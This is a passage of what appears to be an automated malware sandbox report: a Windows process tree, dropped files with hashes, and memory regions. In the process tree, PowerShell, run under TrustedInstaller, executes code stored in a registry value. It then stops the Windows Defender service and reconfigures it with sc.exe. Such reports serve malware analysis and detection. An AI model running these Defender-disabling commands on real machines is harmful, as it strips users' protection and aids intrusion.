wAtACMA
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:5076
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\system32\sc.exe" qc windefend
            4⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1644
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4740
          • C:\Windows\SysWOW64\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4116
          • C:\Windows\SysWOW64\net1.exe
            "C:\Windows\system32\net1.exe" start TrustedInstaller
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2496
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4200
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4956
    • C:\Windows\servicing\TrustedInstaller.exe
      C:\Windows\servicing\TrustedInstaller.exe
      1⤵
        PID:1956
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2472
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\system32\sc.exe" qc windefend
            3⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:3924
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1396
          • C:\Windows\SysWOW64\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            3⤵
            • System Location Discovery: System Language Discovery
            PID:60
          • C:\Windows\SysWOW64\net1.exe
            "C:\Windows\system32\net1.exe" stop windefend
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2580
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
            3⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:3552
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:1268
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\system32\sc.exe" qc windefend
            3⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1796
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1720
          • C:\Windows\SysWOW64\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            3⤵
            • System Location Discovery: System Language Discovery
            PID:5084
          • C:\Windows\SysWOW64\net1.exe
            "C:\Windows\system32\net1.exe" stop windefend
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1156
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
            3⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:3576
      • C:\Windows\system32\LogonUI.exe
        "LogonUI.exe" /flags:0x4 /state0:0xa3947055 /state1:0x41c64e6d
        1⤵
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious use of SetWindowsHookEx
        PID:4984

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        968cb9309758126772781b83adb8a28f

        SHA1

        8da30e71accf186b2ba11da1797cf67f8f78b47c

        SHA256

        92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

        SHA512

        4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        17KB

        MD5

        a06f07d9b19fa50065f44f9045447acf

        SHA1

        5ce080adcfe8b62d353b9d692488ffe6b838833c

        SHA256

        7a227352b9ccb9add72a7f86a54e1eba7242b3464614ece99db1c8a159b3ea6c

        SHA512

        ff465f725e6d63b945d0d284119e0560ca3bff570705788455a9b36f002d532af6d889e875809261a6d31774a4aa017003c2c07bbcf91ae022c25bbfc3fa29e5

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        21KB

        MD5

        9fb7019017b489dfe96e6fc59942199c

        SHA1

        2b2704fb30e985f8b5bc6c580811aeaf3a5df254

        SHA256

        e89c3e7d914f98f1bbb76af120f53ab20b430de7470358125f2420228985b0ab

        SHA512

        a8cdb43484ce6fbff1bc1e591bd706f4bd220865a0655b0823fc5b20381d723cb141d4b6c44d1eff226a0f060b06a70cb80f7b6e283ab92c4dac7bc776c92df9

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        20KB

        MD5

        d00e5c857f1391410cc0d08f83a504c7

        SHA1

        13945fb064a73d6147946abf5e733a6be8e8cf5d

        SHA256

        e6459b633d35593eda2e2bf4e2330d5a82ac6f19e46b53aa83b22379db627cf8

        SHA512

        6d3f0935444760e60c7eea87f82ec4fc0e9cd7838c92308c35053694bd7421d0bd7f4699c4cbe95dbe698df132df96f27f9128ddad48bae76b77304b9be3a5c9

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        20KB

        MD5

        45809bed96414bdb3c002bf0e2f90464

        SHA1

        5a289999cd8e120e810ef14afba6678a7b780203

        SHA256

        63549006a8d1232af68569ee1cd26eb7dd396e36a77308ca51cb81bb0919e502

        SHA512

        0b960fb777e80ea85723ec0cfa0239f05ef06e7b5885cf27a9a6a49ba8ffab467417473a9a16cd23eceeba6c8fef5224892645f18f3eedac64bc61c177a2f646

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        16KB

        MD5

        08f99b81607cda7b4f558c64effc6d9a

        SHA1

        e987bd47942ffe8533d720d7e7a9138ff6a91c44

        SHA256

        5e4c93a87e73ba7c2bd65739c5e5b2150b156623938def318caae27d0be36853

        SHA512

        f6dadb51ed17e145ffa8969826f80e32e1f0eb5c84641e3e0533fee1d3b5166ece6f9219c37c1a33f01ddfdfef5c4515b2c043258da00214682f4b65f36ea5a4

        Download Submit

      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133702355494718137.txt
        Filesize

        75KB

        MD5

        ca4097387e80e5a9fd2ba63e5c490795

        SHA1

        152e3f983d7df27102f013de2182c21ccba984cb

        SHA256

        96a3edcc582658828919fe66c407ee3cd749c8c31b5deb440ec2cacc43c44002

        SHA512

        341970ff48a013359155d0e792183c0185091137ab1b9d6f2275475710b31b24dbadf4637afb6291e861bcf66863a6fd439ed1aa6551d4c4abc64f7112ae654b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RES6D0D.tmp
        Filesize

        1KB

        MD5

        fa0d1e73fba3dbe0dd303dbd82cd3f1f

        SHA1

        1ec8191ddadc4d60f0d10dbfd03612d96426af9e

        SHA256

        7ace37ae02f9bcfa5ca50f747dfe95d4e20d6be81f9efb83a3a0d93f89989d08

        SHA512

        1f468cd398536dcf68a66d334fc1d9e25117d026643979e4fd39d4cac9fdbdda777bb31776852613baf3f8e7820e03c9154e4575c70e2c47941433557de7e231

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RESBD11.tmp
        Filesize

        1KB

        MD5

        e78df11e8c2282689c5e6b452bb2bc22

        SHA1

        5d796626b6342462cd533229987175a74295968c

        SHA256

        b7583f109ea482d8c87a717c299018f2d6594fca5fba79fd4b257e1ce00f014d

        SHA512

        5c263799cf1d9e9cd0d381c8e48aa425803c4870cd3ff7525ada627ab220251c899253dce102a03c02a2cca607babb5376e3d51702d2f6e6c2aa34e75bd6189f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe
        Filesize

        4KB

        MD5

        37d72e4ad2a76574df71177625a793ec

        SHA1

        ae1a60890e0e3adef9c1999b52400356b0b05e1a

        SHA256

        67c103ac24542308a204136fea4ffb4f871afbd8c38b308c60348cf8df21e324

        SHA512

        770f51eafba56068f3813ff5d2035771bd88b8642c693d76a260376b1a5c8769cb0502697f6ba60791aa49511f896565fa6396758d6165e07e97ca96916686d5

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p3hntdbe.mkp.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\rescale.ps1
        Filesize

        584B

        MD5

        5957e298325fe672f062f0607e67611d

        SHA1

        39b8b3d28a1c4ef5306e207de9b8b08197c60f79

        SHA256

        a10479eea5f9d85ac00db77c0e090de2db64cdb163055e7b42fbcb2c97a66898

        SHA512

        85f5ee03ae0c555ef5d51d2026f2532cc8155b73f75e91ac4ed727abf4578a8b065a3b053ca071ac67eb739cadab1e0e994676c4effa6198b9c536ce5c91e7bf

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\xybu4d5q\xybu4d5q.dll
        Filesize

        3KB

        MD5

        8c79b80d95ff346850a5e47310fc6f0f

        SHA1

        56602bc0e38e162b6decfe2f9e8a00b1ec2db9c8

        SHA256

        1eba71b1df8a5a49d4a89ce7dea290e1ebf972cd3fcf024eacf32ddaa173eb1a

        SHA512

        4b089867083815a79fd9c86c281e128def550ff6d6fbf8cb7dcc6a8f516ce159bc3bb5987da7d45668bf67515fd86cec9dd9dd5cf3e30fc3268da6fc415a5ad3

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\CSC57A2C2CFE9694AAEB9A9A9D05636D9CF.TMP
        Filesize

        1KB

        MD5

        be7ee5c1b32c4c11ab8d5855c0a674a2

        SHA1

        4b1459595dd3e98efc33d5b17d0d57ab07e181bc

        SHA256

        6b3182ccdb0009b1f400d59a30915bf72319b0969a6717460af9cd1d940f5bef

        SHA512

        61be4353f0ef7c67513e0c93a22de404f897ee83a519e2d9c352cb3d4ba584d236bf99476b64238d15f1bbdef22c333cb0f8e75255d6cc8756739c928ecf131e

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\sxpftdmg\sxpftdmg.0.cs
        Filesize

        1KB

        MD5

        99e19d86ac0d1a7c824b4f95eb85a09c

        SHA1

        f942d4b0e891b6c7e37f76a98c8f06f0e87b0dbb

        SHA256

        d0b7f831c8935682f52aebbcfa631d97715b83e1267cb2b7bf71533942945863

        SHA512

        698bdd2a512f498fff28a6a55561919f2cb13847e757408b87aa53f8efaccb13d1bf171e2192298f487217b71a9312af377276f33ddd92ee9952924eadcbc049

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\sxpftdmg\sxpftdmg.cmdline
        Filesize

        451B

        MD5

        6e620bffd47dc334ee9e2ac05f9216e2

        SHA1

        6c6a528b841c450052d45215cdb32cf13d47f660

        SHA256

        f2896f9a768a55903085cf1b6b3da9c053d61ecbb81e22ebf8efd0744013abe5

        SHA512

        aa58dbfe72555099b5301aa7656de448aca99805c072751a139f69b0056a330cc56776dc80b4e52efb11caf523e9b1eb3f042aaa4fcb71c0aeaf409f7f300f36

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\xybu4d5q\CSCB281B69A6145420BB5C54E4B9B53BBB0.TMP
        Filesize

        652B

        MD5

        3bfbedf459b3998e2c13e6277a2eb72c

        SHA1

        2b8e6baefd2c4a78712ee5429f3f7e59d89e9c70

        SHA256

        9dbdfc4ee44962c56d7360e965afd62a71a14799634cc0cb55bac82ae84b7bf7

        SHA512

        cbda3ed7cd1b3dae32b302687620b0b4b3769687d51c11902f9d747691f05479404cb9006d3f94e73ee0f71e1f9441f593298a1766d7d5748fd3a8ce7366305b

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\xybu4d5q\xybu4d5q.0.cs
        Filesize

        380B

        MD5

        16ec6a1216a8b82d7bc3d0b0b4847f1d

        SHA1

        874a97587db13e8d55bdfcc5ef69681c759549ca

        SHA256

        0717362217b55ae4b8ed86790fcae2997f7dcb9d931e687566960b54297adf1e

        SHA512

        234e9052025e789468b08ed3c01d164afc6be21f9fb6c4fdf759fda611b5ed02a16d01dfbd0213eeca63492abd3e945704d50264f04538694487cd2b5dd121b6

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\xybu4d5q\xybu4d5q.cmdline
        Filesize

        369B

        MD5

        66bd43597f729451ae834b6dfe32c1ba

        SHA1

        9d07eeede7ca2faea0d4f7863b690fa7ac67c027

        SHA256

        60c30872ea378d32ccffc7029774134b971caaaa6449a151f9fb20cf79f7c0b0

        SHA512

        e24d404a9d17c3e90c041f430a617f1aeccb6d53f02a34155fcca181b214e5778a136421eceb3c8a7e30191bc81f8bb83b8dded12f146635b5d88fc0e31d332c

        Download Submit

      • memory/932-287-0x0000000000180000-0x0000000000188000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2472-312-0x0000000005CE0000-0x0000000005D2C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3108-75-0x0000000002E10000-0x0000000002E11000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3736-5-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/3736-350-0x0000000075090000-0x0000000075840000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3736-225-0x0000000075090000-0x0000000075840000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3736-9-0x00000000051B0000-0x0000000005754000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3736-7-0x0000000075090000-0x0000000075840000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4012-8-0x0000000075090000-0x0000000075840000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4012-1-0x00000000003A0000-0x0000000000422000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4012-2-0x0000000004DC0000-0x0000000004E5C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/4012-3-0x0000000004E60000-0x0000000004EF2000-memory.dmp

        Filesize

        584KB

        Download

      • memory/4012-0-0x000000007509E000-0x000000007509F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4012-4-0x0000000075090000-0x0000000075840000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4100-50-0x0000000070510000-0x000000007055C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4100-68-0x00000000070E0000-0x00000000070FA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4100-14-0x0000000005420000-0x0000000005486000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4100-67-0x0000000006FF0000-0x0000000007004000-memory.dmp

        Filesize

        80KB

        Download

      • memory/4100-10-0x0000000000D20000-0x0000000000D56000-memory.dmp

        Filesize

        216KB

        Download

      • memory/4100-11-0x0000000004BB0000-0x00000000051D8000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/4100-12-0x0000000005210000-0x0000000005232000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4100-13-0x00000000053B0000-0x0000000005416000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4180-299-0x00000000060C0000-0x000000000610C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4180-297-0x0000000005920000-0x0000000005C74000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4180-300-0x0000000006FF0000-0x0000000007012000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4356-51-0x00000000079C0000-0x0000000007A63000-memory.dmp

        Filesize

        652KB

        Download

      • memory/4356-62-0x0000000007790000-0x00000000077AA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4356-34-0x0000000006730000-0x000000000674E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4356-25-0x0000000006150000-0x00000000064A4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4356-39-0x0000000070510000-0x000000007055C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4356-61-0x00000000080F0000-0x000000000876A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/4356-35-0x0000000006760000-0x00000000067AC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4356-38-0x0000000006CE0000-0x0000000006D12000-memory.dmp

        Filesize

        200KB

        Download

      • memory/4356-49-0x0000000006CC0000-0x0000000006CDE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4356-63-0x0000000007AD0000-0x0000000007ADA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4356-64-0x0000000007CC0000-0x0000000007D56000-memory.dmp

        Filesize

        600KB

        Download

      • memory/4356-65-0x0000000007C50000-0x0000000007C61000-memory.dmp

        Filesize

        68KB

        Download

      • memory/4356-66-0x0000000007C80000-0x0000000007C8E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/4356-69-0x0000000007D70000-0x0000000007D78000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4764-267-0x0000000007880000-0x0000000007888000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4764-247-0x00000000062F0000-0x0000000006644000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4764-253-0x0000000006A90000-0x0000000006ADC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4956-77-0x0000024E2FDA0000-0x0000024E2FEA0000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/4956-82-0x0000025631E70000-0x0000025631E90000-memory.dmp

        Filesize

        128KB

        Download

      • memory/4956-78-0x0000024E2FDA0000-0x0000024E2FEA0000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/4956-104-0x0000025632240000-0x0000025632260000-memory.dmp

        Filesize

        128KB

        Download

      • memory/4956-93-0x0000025631E30000-0x0000025631E50000-memory.dmp

        Filesize

        128KB

        Download

      • memory/5076-314-0x00000000060C0000-0x0000000006414000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/5076-325-0x00000000067C0000-0x000000000680C000-memory.dmp

        Filesize

        304KB

        Download